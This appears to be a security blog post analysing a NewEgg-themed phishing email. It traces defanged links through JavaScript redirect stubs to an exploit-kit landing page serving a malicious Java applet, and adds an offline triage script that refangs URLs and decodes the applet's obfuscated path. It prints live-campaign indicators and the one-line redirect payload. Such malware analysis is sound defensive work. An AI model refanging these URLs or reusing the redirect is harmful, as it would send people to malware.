If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.
(Sanitized image from Outlook with no images loaded)
Not surprisingly, the links all point to one initial URL, hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):
hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js
All three files contain the same one-line JavaScript redirect to a single location (URL altered to prevent clicking):
document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';
This points to the final page, which embeds a Java applet. The archive path is obfuscated, partly with hexadecimal HTML character entities; once decoded, the applet loads (URL altered to prevent clicking):
hxxp://216[dot]224[dot]182[dot]94/data/Klot.jar?a=1
The applet is invoked with a "code" parameter of code="ta.tc" (class tc in package ta). The archive contains 3 files:
ta/ta.class
ta/tb.class
ta/tc.class
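To triage a chain like this offline, here is an added helper script (my own, not the post's and not from any of the sites involved) that refangs the hxxp/[dot] notation, pulls the document.location target out of a js.js stub, decodes hex character references on the landing page to recover the applet's archive and code attributes, and hashes and lists a .jar so the hash can be compared with VirusTotal. The js stub, the landing-page markup and the in-memory jar are constructed samples that mirror the values reported above; in particular, the assumption that the obfuscation is plain HTML `&#x..;` entities is mine, and a real landing page may instead hide the path inside hex escapes in a script, which `html.unescape` will not touch.

```python
import hashlib
import html
import io
import re
import zipfile

# Constructed samples (not captured from the real campaign); the values
# mirror what the post reports so the functions can be exercised offline.
SAMPLE_JS = ("document.location='hxxp://216[dot]224[dot]182[dot]94"
             "/showthread.php?t=d7ad916d1c0396ff';")

# ASSUMPTION: the landing page hides the archive path behind HTML hex
# character references (&#x..;). Decoded, this reads data/Klot.jar?a=1.
SAMPLE_PAGE = (
    '<html><body><applet archive="&#x64;&#x61;&#x74;&#x61;&#x2f;&#x4b;'
    '&#x6c;&#x6f;&#x74;&#x2e;&#x6a;&#x61;&#x72;&#x3f;&#x61;&#x3d;&#x31;" '
    'code="ta.tc" width=1 height=1>'
    '<param name="code" value="ta.tc"/>'
    '</applet></body></html>'
)


def refang(url):
    """Turn hxxp://a[dot]b back into http://a.b so other tools can consume it."""
    url = re.sub(r'^hxxp', 'http', url, flags=re.I)
    return re.sub(r'\[(?:dot|\.)\]', '.', url, flags=re.I)


def extract_redirect(js_source):
    """Return the target of a document.location='...' (or .href) assignment."""
    m = re.search(r"document\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]",
                  js_source)
    return m.group(1) if m else None


def extract_applet(markup):
    """Decode character entities, then pull archive/code from the <applet> tag."""
    decoded = html.unescape(markup)          # handles &#x..; and &#..; forms
    m = re.search(r'<applet\b([^>]*)>(.*?)</applet>', decoded, re.I | re.S)
    if not m:
        return None
    attrs = dict(re.findall(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)', m.group(1)))
    params = dict(re.findall(
        r'<param\b[^>]*?name\s*=\s*["\']?(\w+)["\']?[^>]*?value\s*=\s*["\']?([^"\'\s>]+)',
        m.group(2), re.I))
    return {
        'archive': attrs.get('archive'),
        'code': attrs.get('code') or params.get('code'),
        'params': params,
    }


def build_sample_jar():
    """Constructed stand-in for Klot.jar: three empty class entries, no bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as jar:
        for name in ('ta/ta.class', 'ta/tb.class', 'ta/tc.class'):
            jar.writestr(name, b'')
    return buf.getvalue()


def inspect_jar(data):
    """Hash the archive (to look up on VirusTotal) and list its entries."""
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        entries = sorted(jar.namelist())
    return {'sha256': hashlib.sha256(data).hexdigest(), 'entries': entries}


if __name__ == '__main__':
    hop = extract_redirect(SAMPLE_JS)
    print('js.js redirects to:', refang(hop))
    applet = extract_applet(SAMPLE_PAGE)
    print('applet archive:', applet['archive'], 'code:', applet['code'])
    report = inspect_jar(build_sample_jar())
    print('jar sha256:', report['sha256'])
    for entry in report['entries']:
        print('  ', entry)
```

Run it as a script for the summary, or import it and feed `extract_redirect` the real js.js bodies and `extract_applet` the fetched landing page (from an isolated analysis VM, never a production workstation). The sha256 from `inspect_jar` is what you paste into VirusTotal's search box to find the existing report instead of re-uploading the sample.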
At this point, it is pretty clearly a Java exploit, and the Blackhole exploit kit comes to mind (a showthread.php?t=<hex> landing URL is a pattern commonly seen with it). Here are the VirusTotal results (you will see my initial analysis there, which is also contained in this blog post):
https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/
As any malware worth deploying in a phishing campaign should, the file receives a not-so-shocking 0/42 detections. I wonder how many users clicked this? Luckily, the individuals who received this one did not; instead, they forwarded it to me for advice. Whew!
Coming up, I'll attempt to dig into analyzing the decompiled Java code...